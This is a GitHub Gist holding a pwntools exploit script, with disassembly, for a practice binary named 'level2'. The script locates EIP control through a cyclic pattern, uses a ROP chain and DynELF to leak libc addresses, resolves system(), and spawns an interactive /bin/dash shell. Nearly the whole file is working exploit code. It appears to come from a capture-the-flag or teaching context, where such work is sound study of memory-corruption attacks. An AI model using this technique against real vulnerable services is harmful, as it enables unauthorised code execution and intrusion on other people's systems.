Last active
June 21, 2016 00:43
-
-
Save zachriggle/b998c6430f954fc6cb9756054f3c353c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from pwn import * | |
# Here's the disassembly for everything | |
""" | |
0804844b <vulnerable_function>: | |
804844b: 55 push ebp | |
804844c: 89 e5 mov ebp,esp | |
804844e: 81 ec 88 00 00 00 sub esp,0x88 | |
8048454: 83 ec 04 sub esp,0x4 | |
8048457: 68 00 01 00 00 push 0x100 | |
804845c: 8d 85 78 ff ff ff lea eax,[ebp-0x88] | |
8048462: 50 push eax | |
8048463: 6a 00 push 0x0 | |
8048465: e8 a6 fe ff ff call 8048310 <read@plt> | |
804846a: 83 c4 10 add esp,0x10 | |
804846d: c9 leave | |
804846e: c3 ret | |
0804846f <main>: | |
804846f: 8d 4c 24 04 lea ecx,[esp+0x4] | |
8048473: 83 e4 f0 and esp,0xfffffff0 | |
8048476: ff 71 fc push DWORD PTR [ecx-0x4] | |
8048479: 55 push ebp | |
804847a: 89 e5 mov ebp,esp | |
804847c: 51 push ecx | |
804847d: 83 ec 04 sub esp,0x4 | |
8048480: e8 c6 ff ff ff call 804844b <vulnerable_function> | |
8048485: 83 ec 04 sub esp,0x4 | |
8048488: 6a 0d push 0xd | |
804848a: 68 30 85 04 08 push 0x8048530 | |
804848f: 6a 01 push 0x1 | |
8048491: e8 aa fe ff ff call 8048340 <write@plt> | |
8048496: 83 c4 10 add esp,0x10 | |
8048499: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4] | |
804849c: c9 leave | |
804849d: 8d 61 fc lea esp,[ecx-0x4] | |
80484a0: c3 ret | |
""" | |
# Load the ELF from disk so we can grab libc | |
elf = ELF('./level2') | |
# Determine where stack control is by forcing a core dump. | |
io = process('./level2') | |
io.sendline(cyclic(1024)) | |
io.recvall() | |
core = Core('core') | |
eip = cyclic_find(core.eip) | |
log.info("EIP control @ %i" % eip) | |
# Actually exploit the process this time | |
io = process('./level2') | |
# Create a ROP stack to dump the GOT and return to main() | |
# so we can exploit again. | |
@MemLeak | |
def leak(address): | |
rop = ROP(elf) | |
rop.write(1, address, 4) | |
rop.main() | |
io.send(fit({ | |
eip: str(rop) | |
})) | |
return io.recvn(4) | |
de = DynELF(elf=elf, leak=leak) | |
system = de.lookup('system', 'libc') | |
rop = ROP(elf) | |
bin_dash = '/bin/dash\x00' | |
rop.read(0, elf.bss(), len(bin_dash)) | |
rop.call(system, [elf.bss()]) | |
io.send(fit({ | |
eip: str(rop) | |
})) | |
io.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment